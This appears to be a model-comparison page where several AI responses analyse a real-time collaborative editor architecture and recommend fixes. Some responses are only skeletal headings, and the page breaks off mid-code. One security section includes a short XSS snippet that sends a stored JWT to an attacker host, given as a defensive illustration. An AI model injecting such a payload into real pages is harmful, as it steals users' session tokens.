Single-shot · temp 0.7 · blind votes · identical prompts·How we test →
Ask them anything yourself
Identify failure modes, race conditions, and scaling bottlenecks in a collaborative document editor architecture.
Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
Below is a systematic “failure‑mode → root cause → mitigation” map for the architecture you described.
I grouped the items into four logical layers (client ↔ network ↔ API ↔ data) and then added a cross‑cutting “operational” section (security, observability, cost, etc.). For each problem I list a concrete remedy and the main trade‑offs you’ll have to consider.
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 1.1 | Lost or out‑of‑order WebSocket messages | TCP guarantees order, but a client can reconnect to a different API instance and miss messages that were broadcast only on the original server. | Introduce a message‑sequence number + ACK on the client side and a re‑play buffer on each server (e.g., recent 10 s of changes). When a client reconnects, it sends the last sequence it processed and the server re‑sends any missing deltas. <br>Trade‑off: extra memory on the server and a small latency spike on reconnect; complexity in the client‑side state machine. |
| 1.2 | Clock skew → wrong “last‑write‑wins” | Clients use their own clocks for timestamps; a fast clock can overwrite a slower one even if the edit happened later. | Server‑generated timestamps (e.g., monotonic logical clock or ULID) instead of client clocks. The client can still send a provisional timestamp for UI ordering, but the authoritative order comes from the server. <br>Trade‑off: adds a round‑trip for each edit (or a small server‑side queue) and requires the server to keep a per‑document logical clock. |
| 1.3 | JWT theft / replay | Token stored in localStorage is accessible to any script on the page (XSS) and can be replayed on another device. | Store JWT in an HttpOnly Secure SameSite cookie and rotate it frequently (e.g., short‑lived access token + refresh token). Use refresh‑token rotation and revocation list. <br>Trade‑off: more complex auth flow; need CSRF protection for cookie‑based auth. |
| 1.4 | Network partitions → “split‑brain” edits | A client may be isolated from the primary API server and connect to a secondary that has stale data. | Use a centralised real‑time broker (e.g., Redis Streams, NATS, or a dedicated OT/CRDT service) that all API instances subscribe to, instead of per‑server broadcast. <br>Trade‑off: introduces a new component and network hop, but guarantees total ordering across the cluster. |
| 1.5 | Large payloads in WebSocket frames | Sending full HTML snapshots every 30 s can overflow the socket buffer on low‑bandwidth connections. | Compress deltas (e.g., JSON‑diff, operational‑transform/CRDT delta) and send only the delta, not the full snapshot. Keep periodic full snapshots for recovery only. <br>Trade‑off: requires a diff algorithm and versioning; adds CPU overhead on both client and server. |
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 2.1 | Broadcast limited to “clients on the same server” | Server A never sees changes from Server B unless the DB poll picks them up; a 2‑second poll window creates a visible lag and possible race conditions. | Replace polling with a publish/subscribe bus (Redis Pub/Sub, Kafka, or a dedicated WebSocket message broker). Each server publishes its delta and subscribes to all others. <br>Trade‑off: extra infrastructure, need to handle message ordering and at‑least‑once delivery. |
| 2.2 | Polling interval too coarse → race conditions | Two users editing the same paragraph on different servers may both write to DB before the poll catches the other’s change, leading to “last‑write‑wins” conflicts. | Use a write‑ahead log / change‑feed (PostgreSQL logical replication, WAL‑2‑JSON, or a dedicated event store). Servers consume the feed in real time, eliminating the need for polling. <br>Trade‑off: more complex DB setup; requires idempotent handling of events. |
| 2.3 | Database write contention | Every keystroke (or batch of keystrokes) triggers a write to PostgreSQL; high‑frequency edits can cause row‑level lock contention on the document table. | Batch edits in memory (e.g., 100 ms window) and write a single UPDATE per user per batch. Alternatively, store deltas in a separate “edits” table and apply them asynchronously to the main snapshot. <br>Trade‑off: introduces a small latency for persistence; adds a background compaction job. |
| 2.4 | Single point of failure in WebSocket connection handling | If a single API instance crashes, all its connected clients lose their real‑time channel until they reconnect. | Deploy a dedicated WebSocket gateway (e.g., Envoy, NGINX, or a managed service like AWS API Gateway WebSocket) that sits in front of the API servers and can gracefully detach/attach connections. <br>Trade‑off: extra network hop; need to forward messages to the correct backend (via sticky sessions or a message bus). |
| 2.5 | Load‑balancer sticky‑session misconfiguration | Round‑robin without stickiness forces a client to reconnect to a different server on each request, breaking the per‑server broadcast model. | Enable session affinity (IP‑hash or cookie‑based) for WebSocket upgrades, or better, decouple connection handling from business logic (see 2.4). <br>Trade‑off: can lead to uneven load distribution; affinity may break when a server is drained for maintenance. |
| 2.6 | Memory leak in per‑connection buffers | Keeping a per‑client delta buffer for replay can grow unbounded if a client stays idle for a long time. | Set a TTL on buffers (e.g., 30 s) and drop the oldest entries when the buffer exceeds a size limit. Use a circular buffer implementation. <br>Trade‑off: a very slow client may miss some deltas and need to request a full snapshot. |
| 2.7 | Back‑pressure on WebSocket writes | If a client’s network is slow, the server’s write buffer can fill, causing the Node.js event loop to block or crash. | Implement flow‑control: pause reading from the source when the socket’s bufferedAmount exceeds a threshold, and resume after a drain event. <br>Trade‑off: adds latency for slow clients; may need to drop or compress older deltas. |
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 3.1 | Snapshot every 30 s → storage churn | Writing a full HTML blob every half‑minute for many active documents can saturate I/O and increase storage costs. | Store only incremental deltas and generate a snapshot lazily (e.g., after N edits or when a user requests a version). Keep a periodic “checkpoint” (e.g., every 5 min) for fast recovery. <br>Trade‑off: recovery requires replaying deltas; more complex compaction logic. |
| 3.2 | Read‑replica lag | If the API reads from replicas for “current document state”, lag can cause a client to see stale data after a recent edit. | Read‑your‑writes: after a successful write, read back from the primary (or use a “write‑through cache” in Redis). <br>Trade‑off: extra read load on the primary; may need to tune replica lag thresholds. |
| 3.3 | PostgreSQL row‑level lock contention | Simultaneous UPDATEs on the same document row cause lock waiting, increasing latency and possibly deadlocks. | Use SELECT … FOR UPDATE SKIP LOCKED on a “pending edits” table, or store edits in a separate table keyed by (document_id, edit_seq) and let a background worker merge them into the snapshot. <br>Trade‑off: more tables and background jobs; eventual consistency for the snapshot. |
| 3.4 | Redis cache eviction / stale session data | If the session cache is not sized correctly, eviction can cause a user to lose their edit‑state, forcing a full reload. | Use a TTL per session (e.g., 5 min) and a “fallback” to DB if a cache miss occurs. Monitor cache hit‑rate and size the cluster accordingly. <br>Trade‑off: higher memory cost; occasional extra DB reads. |
| 3.5 | Schema evolution / migration downtime | Adding a new column to the document table (e.g., for metadata) can lock the table for a noticeable period. | Use online schema change tools (e.g., pg_repack, pt-online-schema-change) or add new columns with default NULL and back‑fill in batches. <br>Trade‑off: longer migration window; need to coordinate with rolling releases. |
| 3.6 | Data loss on sudden crash | If a write is acknowledged to the client before PostgreSQL has flushed to disk, a crash could lose the edit. | Enable synchronous_commit = on for critical tables, or use two‑phase commit with a write‑ahead log in Redis that is persisted before acknowledging. <br>Trade‑off: higher latency for each write; extra complexity in failure recovery. |
| # | Issue | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 4.1 | CDN caching of API responses | Caching API JSON for 5 min can serve stale document data after an edit. | Add Cache-Control: no‑store on any endpoint that returns mutable document state. Use CDN only for static assets and truly immutable API calls (e.g., list of templates). <br>Trade‑off: loses the small latency benefit of CDN for those endpoints. |
| 4.2 | Horizontal scaling without sharding | Adding more API servers only spreads load; the DB remains a single bottleneck for writes. | Partition documents by organization ID (or hash of doc‑id) and assign each partition to a dedicated DB shard (or use a multi‑tenant PostgreSQL with separate schemas). <br>Trade‑off: operational overhead of managing multiple shards; cross‑shard queries become more complex. |
| 4.3 | Single point of failure in load balancer | If the LB crashes, all traffic is lost. | Deploy a highly‑available LB pair (e.g., AWS ALB with multiple AZs, or HAProxy with VRRP). <br>Trade‑off: cost of extra instances and health‑check configuration. |
| 4.4 | Observability gaps | No metrics on WebSocket latency, queue depth, or DB write latency → hard to detect a bottleneck. | Instrument the stack: Prometheus metrics for socket bufferedAmount, DB query time, Redis hit‑rate; distributed tracing (OpenTelemetry) across the WebSocket → API → DB path. <br>Trade‑off: adds CPU/IO overhead and requires a monitoring stack. |
| 4.5 | Security – CSRF on JWT cookie | If you move JWT to HttpOnly cookie, a malicious site could still trigger a request with the cookie. | SameSite=Strict or Lax plus CSRF token for state‑changing endpoints. <br>Trade‑off: may break legitimate cross‑origin use cases (e.g., embedding the editor in another domain). |
| 4.6 | Versioning / backward compatibility | Clients may be on older JS bundles that expect a different message format. | Add a version field in every WebSocket message and have the server negotiate a compatible protocol (or reject with a clear error). <br>Trade‑off: extra code path for version handling; need to retire old versions. |
| 4.7 | Cost of frequent snapshots | Storing a full HTML snapshot every 30 s for thousands of documents can explode storage costs. | Compress snapshots (gzip/ Brotli) and store them in object storage (S3) with lifecycle policies, while keeping only the latest N snapshots in PostgreSQL. <br>Trade‑off: additional latency when retrieving older versions; need a background job to sync between DB and object storage. |
| Phase | Primary Goal | Key Changes | Approx. Effort |
|---|---|---|---|
| Phase 1 – Real‑time reliability | Remove per‑server broadcast & polling | • Introduce a central pub/sub broker (Redis Streams or NATS). <br>• Switch to server‑generated timestamps. <br>• Add sequence‑number ACK/replay for reconnects. | 2‑3 weeks (broker setup + code changes). |
| Phase 2 – Data‑layer optimisation | Reduce DB contention & storage churn | • Store deltas in an “edits” table, periodic snapshot worker. <br>• Batch DB writes (100 ms window). <br>• Enable logical replication feed for near‑real‑time change propagation. | 3‑4 weeks (schema changes + background workers). |
| Phase 3 – Security & auth hardening | Prevent token theft & stale cache | • Move JWT to HttpOnly SameSite cookie + refresh‑token rotation. <br>• Remove CDN caching for mutable API endpoints. | 1‑2 weeks (auth flow changes). |
| Phase 4 – Scaling & resilience | Prepare for horizontal growth | • Deploy a dedicated WebSocket gateway with sticky‑session fallback. <br>• Add DB sharding/partitioning by org ID. <br>• Set up HA load balancer and health checks. | 4‑6 weeks (infrastructure provisioning). |
| Phase 5 – Observability & ops | Detect and react to failures early | • Export Prometheus metrics & OpenTelemetry traces. <br>• Implement alerting on socket lag, DB write latency, Redis hit‑rate. | 1‑2 weeks (instrumentation). |
| Category | Core Problem | Quick Fix | Long‑Term Fix |
|---|---|---|---|
| Real‑time ordering | Client timestamps + per‑server broadcast | Server‑generated timestamps + ACK replay | Central pub/sub + CRDT/OT engine |
| Latency & lost updates | 2‑s DB poll + reconnection to different server | Reduce poll to < 200 ms or use change‑feed | Event stream (Logical Replication / Kafka) |
| DB write contention | One row per document, many concurrent UPDATEs | Batch edits, store deltas in separate table | Append‑only log + background compaction |
| Snapshot storage | Full HTML every 30 s | Store only deltas, compress snapshots | Object‑store checkpoints + lazy snapshot generation |
| Auth & token safety | JWT in localStorage | HttpOnly SameSite cookie + refresh rotation | OAuth‑style short‑lived access tokens + revocation list |
| Scaling bottleneck | Single PostgreSQL primary | Read‑replicas for reads, logical replication for writes | Horizontal sharding / multi‑tenant schemas |
| Cache staleness | CDN caching API responses | Cache-Control: no-store on mutable endpoints | Edge‑side invalidation via webhook on edit |
| Observability | No metrics on WebSocket health | Add simple latency counters | Full distributed tracing + alerting pipeline |
Implementing the Phase 1 changes (centralised pub/sub + server timestamps) will instantly eliminate the most visible race conditions (out‑of‑order updates, stale broadcasts). From there, you can progressively address storage, security, and scaling concerns while keeping the system observable and resilient.
This architecture for a real-time collaborative document editor is a solid starting point, but it contains several potential failure modes, race conditions, and scaling bottlenecks. We'll outline these issues by category and provide specific solutions, along with trade-offs for each.
| Issue | Solution | Trade-off |
|---|---|---|
| Client timestamp conflicts | Use server timestamps or CRDT | Complexity vs correctness |
| Polling DB for changes | Use LISTEN/NOTIFY or CDC | Infra changes |
| WebSocket scaling | Use Redis Pub/Sub or managed service | Increased infra complexity |
| JWT in localStorage | Use Secure HttpOnly cookies | Auth flow complexity |
| Full document snapshots | Store diffs + snapshots | More storage logic |
| CDN caching API | Use no-store / ETags | Lower cache hit rate |
| Redis single point | Use Redis cluster | Higher cost |
| PostgreSQL SPOF | Use managed DB with failover | Cost, setup |
| Load balancer routing | Use sticky sessions | State management |
| Org-based partitioning | Add finer-grained partitioning | Complexity |
By addressing these failure modes and bottlenecks with targeted improvements, this architecture can scale more robustly while maintaining real-time collaboration and data integrity.
The proposed architecture for the real-time collaborative document editor has several potential failure modes, race conditions, and scaling bottlenecks. Here are the identified issues and proposed solutions with their trade-offs:
Single Point of Failure: Load Balancer
Scaling Bottleneck: WebSocket Connections
Race Condition: Document Updates
Scaling Bottleneck: Database Writes
Scalability Limit: Document Partitioning
Security Concern: JWT Token Storage
Caching Effectiveness: API Response Caching
By addressing these potential issues, the proposed architecture can be improved to achieve better reliability, scalability, and performance for the real-time collaborative document editor.
I'll analyze this architecture systematically and identify key issues along with potential solutions:
Solution B: Move to Kafka for event streaming
Recommendations for Implementation Priority:
This would provide a more robust foundation while keeping immediate implementation complexity manageable. The more complex solutions (like sharding) can be implemented as needed based on actual usage patterns and growth.
Issue: Client connections can fail due to network issues or server restarts, causing lost updates. Solution: Implement automatic reconnection with change buffering
Trade-offs: Increases client-side complexity; potential for complex conflict resolution when reconnecting after extended offline periods
Issue: Changes only broadcast to clients connected to the same server Solution: Replace polling with a proper pub/sub system
Trade-offs: Adds Redis as another critical component; requires handling Redis outages
Issue: If PostgreSQL fails, the entire system becomes unusable Solution: Implement multi-level persistence strategy
Trade-offs: Significantly increases operational complexity; eventual consistency challenges
Issue: Using client clocks for conflict resolution is unreliable Solution: Implement proper distributed sequence tracking
Trade-offs: OT/CRDTs introduce significant implementation complexity; requires more metadata with each change
Issue: Paragraph-level "last-write-wins" causes data loss during concurrent edits Solution: Implement finer-grained conflict resolution
Trade-offs: Increases computational overhead; more complex data model
Issue: localStorage tokens vulnerable to XSS; no revocation mechanism Solution: Improve token security
Trade-offs: More complex authentication flow; additional Redis dependency
Issue: Database becomes bottleneck with high concurrent editing Solution: Distributed event sourcing architecture
Trade-offs: Increases system complexity; potentially higher infrastructure costs
Issue: Full HTML snapshots are storage-inefficient and risky Solution: Hybrid storage approach
Trade-offs: More complex recovery and rendering logic; requires migration strategy
Issue: 5-minute API caching conflicts with real-time editing Solution: Targeted caching strategy
Trade-offs: Reduced CDN effectiveness; potentially higher origin load
Issue: Uneven connection distribution across servers Solution: Dedicated real-time tier
Trade-offs: Additional infrastructure component; higher operational complexity
These changes would significantly improve reliability, correctness, and performance of your collaborative editing system.
Problem:
Failure Scenarios:
User A (clock: 2024-01-01 10:00:00) types "Hello"
User B (clock: 2024-01-01 09:59:59) types "World"
Result: "Hello" wins even though "World" was actually typed later
Solutions:
| Approach | Pros | Cons |
|---|---|---|
| Server-assigned Lamport clocks | Logical ordering, no clock sync needed | Requires coordination |
| Hybrid logical clocks (HLC) | Combines wall-clock + logical counter | More complex implementation |
| Operational Transform (OT) | Industry standard, handles intent | Complex to implement correctly |
| CRDT (Conflict-free Replicated Data Types) | Mathematically guaranteed convergence | Memory overhead, learning curve |
Recommended: Implement CRDT (Yjs or Automerge library)
Problem:
Failure Scenario:
Time 0s: User A (Server 1) types "A"
Time 0.5s: User B (Server 2) types "B"
Time 2s: Server 2 polls, gets "A", broadcasts to User B
Time 2.5s: User C (Server 1) sees "AB", User D (Server 2) sees "BA"
Solutions:
| Approach | Latency | Complexity | Cost |
|---|---|---|---|
| Redis Pub/Sub | <50ms | Low | $ |
| RabbitMQ/Kafka | <100ms | Medium | $$ |
| Dedicated WebSocket service (Socket.io with Redis adapter) | <30ms | Low | $ |
Recommended: Redis Pub/Sub with sticky sessions
// On any server receiving a change
redis.publish('document:${docId}', JSON.stringify(change));
// All servers subscribe
redis.subscribe('document:*', (channel, message) => {
const docId = channel.split(':')[1];
broadcastToLocalClients(docId, JSON.parse(message));
});
Problem:
Solutions:
| Approach | Storage | Recovery | History |
|---|---|---|---|
| Event sourcing | 10x more | Complete | Full |
| Operational log + snapshots | 3x more | Good | Configurable |
| Differential snapshots | 2x more | Good | Limited |
Recommended: Event Sourcing with Periodic Snapshots
-- Operations table
CREATE TABLE operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID,
user_id UUID,
operation JSONB, -- CRDT operation
server_timestamp TIMESTAMPTZ DEFAULT NOW(),
lamport_clock BIGINT
);
-- Snapshots table (every 100 operations)
CREATE TABLE snapshots (
document_id UUID,
version BIGINT,
content JSONB,
created_at TIMESTAMPTZ
);
Problem:
Example:
Initial: "The cat"
User A: "The black cat" (inserts "black ")
User B: "The fat cat" (inserts "fat ")
Last-write-wins result: "The fat cat" (User A's work lost)
Correct result: "The black fat cat" or "The fat black cat"
Solution: Use character-level CRDT (Yjs RichText type)
import * as Y from 'yjs';
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');
// Automatically handles concurrent inserts
ytext.insert(4, 'black '); // User A
ytext.insert(4, 'fat '); // User B
// Result preserves both edits with deterministic ordering
Problem:
Solution: Optimistic locking with version numbers
CREATE TABLE documents (
id UUID PRIMARY KEY,
version BIGINT NOT NULL,
content JSONB,
updated_at TIMESTAMPTZ
);
-- Update with version check
UPDATE documents
SET content = $1, version = version + 1, updated_at = NOW()
WHERE id = $2 AND version = $3
RETURNING version;
-- If no rows updated, version conflict occurred
Problem:
Calculation:
100 concurrent users × 60 keystrokes/min = 100 writes/sec ✓
1,000 concurrent users = 1,000 writes/sec ✓
10,000 concurrent users = 10,000 writes/sec (at limit) ⚠️
100,000 concurrent users = 100,000 writes/sec ✗
Solutions:
| Approach | Throughput | Consistency | Complexity |
|---|---|---|---|
| Write-through cache (Redis) | 100k+ ops/sec | Eventual | Low |
| Batch operations | 50k+ ops/sec | Strong | Medium |
| Sharded PostgreSQL (Citus) | 500k+ ops/sec | Strong | High |
Recommended: Redis Write-Through Cache + Async Persistence
// Write to Redis immediately (fast)
await redis.zadd(`ops:${docId}`, timestamp, JSON.stringify(op));
// Async worker drains to PostgreSQL in batches
setInterval(async () => {
const ops = await redis.zrange(`ops:${docId}`, 0, 99);
await pg.query('INSERT INTO operations VALUES ...', ops);
await redis.zrem(`ops:${docId}`, ...ops);
}, 1000);
Problem:
Calculation:
10 servers × 1,000 active docs × 0.5 qps = 5,000 queries/sec
Just for polling! Actual useful work is extra.
Solution: Already covered in #2 (Redis Pub/Sub)
Problem:
Solution: Never cache document content
Cache-Control: no-store, must-revalidate // Document endpoints
Cache-Control: public, max-age=31536000 // Static assets only
Problem:
Solution: HttpOnly cookies + short-lived tokens + refresh tokens
// Access token: 15 minutes, HttpOnly cookie
res.cookie('accessToken', jwt.sign({...}, secret, {expiresIn: '15m'}), {
httpOnly: true,
secure: true,
sameSite: 'strict'
});
// Refresh token: 7 days, stored in Redis for revocation
const refreshToken = crypto.randomBytes(32).toString('hex');
await redis.setex(`refresh:${userId}`, 7*24*60*60, refreshToken);
Problem:
Solution: Periodic token refresh over WebSocket
// Client
setInterval(() => {
ws.send({type: 'REFRESH_TOKEN', token: getNewToken()});
}, 14 * 60 * 1000); // Every 14 minutes
// Server validates and updates connection auth
Problem:
Solution: PostgreSQL with Patroni + HAProxy
┌─────────┐
│ HAProxy │ (virtual IP)
└────┬────┘
├──► [Primary] PostgreSQL + Patroni
├──► [Standby] PostgreSQL + Patroni
└──► [Standby] PostgreSQL + Patroni
Problem:
Solution: Token bucket rate limiter
const rateLimiter = new Map();
function checkRateLimit(userId) {
const limit = rateLimiter.get(userId) || {tokens: 100, lastRefill: Date.now()};
// Refill tokens (10 per second)
const now = Date.now();
const tokensToAdd = Math.floor((now - limit.lastRefill) / 100);
limit.tokens = Math.min(100, limit.tokens + tokensToAdd);
limit.lastRefill = now;
if (limit.tokens < 1) return false;
limit.tokens--;
rateLimiter.set(userId, limit);
return true;
}
┌─────────────┐
│ Clients │
└──────┬──────┘
│ WSS (CRDT operations)
▼
┌──────────────────────────────┐
│ Load Balancer (Sticky) │
└──────┬───────────────────────┘
│
┌───┴────┬────────┬────────┐
▼ ▼ ▼ ▼
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│Node1│ │Node2│ │Node3│ │Node4│
└──┬──┘ └──┬──┘ └──┬──┘ └──┬──┘
│ │ │ │
└────────┴────────┴────────┘
│
┌──────┴──────┐
▼ ▼
┌─────────┐ ┌──────────────┐
│ Redis │ │ PostgreSQL │
│ Pub/Sub │ │ + Patroni │
│ + Cache │ │ (HA Cluster)│
└─────────┘ └──────────────┘
Key Changes:
Performance Targets:
Problem: Clients connected to different servers can't see each other's changes in real-time.
Race Condition Example:
T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2
Result: Inconsistent state between servers
Solutions:
| Solution | Trade-offs |
|---|---|
| Redis Pub/Sub for inter-server messaging | +Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed |
| Use WebSocket gateway (e.g., Socket.io with Redis adapter) | +Battle-tested, -Architectural change, -Added latency layer |
| Event sourcing + distributed log (Kafka) | +Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits |
Recommended: Redis Pub/Sub with message versioning:
// Server A receives edit
async function handleEdit(userId, docId, change, timestamp) {
const version = await db.incrementDocVersion(docId);
// Broadcast to local clients
broadcastToLocalClients(docId, { ...change, version, timestamp });
// Broadcast to all servers via Redis
await redis.publish(`doc:${docId}`, JSON.stringify({
type: 'edit',
change,
version,
timestamp,
serverId: process.env.SERVER_ID
}));
// Write to DB
await db.saveChange(docId, change, version, timestamp);
}
// All servers listen
redis.subscribe(`doc:*`);
redis.on('message', (channel, message) => {
const { docId } = parseChannel(channel);
const { serverId, version } = JSON.parse(message);
// Ignore if from own server (already broadcast)
if (serverId === process.env.SERVER_ID) return;
// Broadcast to local clients with version info
broadcastToLocalClients(docId, JSON.parse(message));
});
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.
Concrete Failure:
Real timeline:
T0 (10:00:00): User B clicks and starts typing "Hello"
T5 (10:00:05): User A clicks and types "Hi" (but A's clock says 10:00:00)
T6 (10:00:06): User B finishes typing
Server receives:
- Edit from A: timestamp=10:00:00, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"
LWW resolution: A's edit wins (earlier timestamp)
Reality: B edited first, but loses
Solutions:
| Solution | Trade-offs |
|---|---|
| Server-assigned timestamps | +Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency |
| Hybrid: Client timestamp + server sequence number | +Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution |
| Operational Transformation (OT) | +Handles concurrent edits correctly, -Complex implementation, -Difficult to debug |
| CRDT (Conflict-free RDT) | +Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes |
Recommended: Hybrid approach with server sequence numbers:
// Client sends timestamp, server assigns sequence
async function saveChange(docId, change, clientTimestamp) {
const serverSequence = await db.getNextSequence(docId);
const serverTimestamp = Date.now();
const changeRecord = {
docId,
change,
clientTimestamp, // For audit/debugging only
serverTimestamp, // For ordering
serverSequence, // Tiebreaker
userId,
version
};
// Conflict resolution uses: (serverSequence, userId) not timestamps
await db.saveChange(changeRecord);
return { serverSequence, serverTimestamp };
}
// Conflict resolution
function resolveConflict(edit1, edit2) {
// Use server sequence as source of truth
if (edit1.serverSequence > edit2.serverSequence) return edit1;
if (edit2.serverSequence > edit1.serverSequence) return edit2;
// Tiebreaker: lexicographic on userId (deterministic)
return edit1.userId < edit2.userId ? edit1 : edit2;
}
Problem: When two users edit overlapping content, one user's work is silently deleted.
Example:
Initial: "The quick brown fox"
User A (para 0-19): Replaces with "The fast brown fox"
User B (para 4-9): Replaces with "The slow brown fox"
With LWW on timestamp:
- If B's edit has later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning shown to either user
Why it matters: Unacceptable in production. Users lose work without knowing.
Solutions:
| Solution | Trade-offs |
|---|---|
| Show conflict UI to users | +Explicit, -Interrupts flow, -Requires UX design |
| CRDT (Automerge/Yjs) | +Automatic sensible merges, +Offline support, -Significant rewrite |
| Operational Transform | +Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve |
| Locking mechanism | +Prevents conflicts, -Reduces concurrency, -Degrades to pessimistic locking |
Recommended: CRDT with Yjs (minimal rewrite):
// Replace full-snapshot storage with CRDT
import * as Y from 'yjs';
class DocumentManager {
constructor(docId) {
this.ydoc = new Y.Doc();
this.ytext = this.ydoc.getText('shared');
}
// Load from DB
async load(docId) {
const updates = await db.getYjsUpdates(docId);
updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
}
// Local edit
applyLocalChange(index, length, text) {
this.ytext.delete(index, length);
this.ytext.insert(index, text);
// Serialize and broadcast
const update = Y.encodeStateAsUpdate(this.ydoc);
return update;
}
// Remote edit
applyRemoteUpdate(update) {
Y.applyUpdate(this.ydoc, update);
// Yjs automatically merges non-overlapping edits
// Overlapping edits use deterministic CRDT rules
}
// Periodic persistence
async saveUpdate(update) {
await db.saveYjsUpdate(docId, update);
}
}
Problem: Cross-server synchronization via polling is fundamentally unscalable.
Math:
Bottleneck:
-- This query runs 50,000 times/second
SELECT * FROM changes
WHERE doc_id = ?
AND created_at > ?
ORDER BY created_at;
Solutions:
| Solution | Trade-offs |
|---|---|
| Replace polling with Redis Pub/Sub | +O(1) message delivery, -Requires architectural change, -Redis becomes SPOF |
| Increase poll interval to 10s | +Reduces load, -Increases latency to 10s, -Unacceptable UX |
| Use database triggers + NOTIFY (PostgreSQL) | +Native, -Requires pg_listen client, -Adds complexity |
| Event streaming (Kafka) | +Scalable, +Audit trail, -Operational overhead |
Recommended: Redis Pub/Sub (already in stack):
// Replace polling entirely
class SyncManager {
constructor() {
this.pubClient = redis.createClient();
this.subClient = redis.createClient();
}
async subscribeToDocument(docId) {
// Subscribe once per document per server
await this.subClient.subscribe(`changes:${docId}`);
this.subClient.on('message', (channel, message) => {
const change = JSON.parse(message);
this.broadcastToConnectedClients(docId, change);
});
}
async publishChange(docId, change) {
// Instant delivery to all servers
await this.pubClient.publish(`changes:${docId}`,
JSON.stringify(change)
);
}
}
// Remove polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);
Problem: User's edits between snapshots can be lost on server crash.
Scenario:
T0: Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in snapshot)
T20: Server crashes
T25: Server restarts, loads last snapshot
Result: " World" is lost
Risk Calculation:
Solutions:
| Solution | Trade-offs |
|---|---|
| Write-ahead log (WAL) for every change | +No data loss, -Disk I/O overhead, -Slower writes |
| Reduce snapshot interval to 5s | +Less data loss window, -6x more snapshots, -DB load increases |
| Event sourcing: store changes, not snapshots | +Perfect audit trail, -Requires replay on load, -Slower cold starts |
| Redis persistence (AOF) | +Fast, +Durable, -Adds Redis complexity |
Recommended: Event sourcing with periodic snapshots:
// Store individual changes, not snapshots
async function saveChange(docId, change, version) {
await db.query(
`INSERT INTO changes (doc_id, change_data, version, created_at)
VALUES ($1, $2, $3, NOW())`,
[docId, JSON.stringify(change), version]
);
// Create snapshot every 100 changes
const changeCount = await db.query(
`SELECT COUNT(*) FROM changes WHERE doc_id = $1`,
[docId]
);
if (changeCount.rows[0].count % 100 === 0) {
await createSnapshot(docId);
}
}
// Load document efficiently
async function loadDocument(docId) {
// Get latest snapshot
const snapshot = await db.query(
`SELECT content, version FROM snapshots
WHERE doc_id = $1
ORDER BY version DESC LIMIT 1`,
[docId]
);
// Replay changes since snapshot
const changes = await db.query(
`SELECT change_data, version FROM changes
WHERE doc_id = $1 AND version > $2
ORDER BY version`,
[docId, snapshot.rows[0]?.version || 0]
);
// Reconstruct document
let doc = snapshot.rows[0]?.content || {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: Multiple authorization vulnerabilities.
Issue 1: localStorage is XSS-vulnerable
// Attacker injects script via malicious document content
<script>
fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>
Issue 2: 5-minute API cache with stale auth
T0: User logs in, gets JWT (valid)
T1: Admin revokes user's access in database
T2: User makes request (still cached, bypasses auth check)
T3: Request succeeds with revoked permissions
Issue 3: 24-hour token expiry is too long
Solutions:
| Solution | Trade-offs |
|---|---|
| httpOnly cookies + CSRF tokens | +Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex |
| Short-lived tokens (15 min) + refresh tokens | +Reduces window of compromise, -More refresh requests, -Requires refresh token storage |
| Remove API caching for auth-required endpoints | +Always enforces current permissions, -Increases load, -Reduces performance |
| Token revocation list (Redis) | +Instant revocation, -Redis lookup per request, -Cache invalidation complexity |
Recommended: httpOnly cookies + short-lived tokens + Redis revocation:
// Auth middleware
async function authMiddleware(req, res, next) {
const token = req.cookies.jwt; // httpOnly cookie
if (!token) return res.status(401).json({ error: 'Unauthorized' });
try {
const decoded = jwt.verify(token, SECRET, {
algorithms: ['HS256'],
issuer: 'https://yourdomain.com',
audience: 'api'
});
// Check revocation list
const isRevoked = await redis.get(`revoked:${decoded.jti}`);
if (isRevoked) {
return res.status(401).json({ error: 'Token revoked' });
}
req.user = decoded;
next();
} catch (err) {
return res.status(401).json({ error: 'Invalid token' });
}
}
// Login endpoint
app.post('/login', async (req, res) => {
const user = await authenticateUser(req.body);
const token = jwt.sign(
{
sub: user.id,
jti: crypto.randomUUID() // Unique token ID for revocation
},
SECRET,
{
expiresIn: '15m', // Short expiry
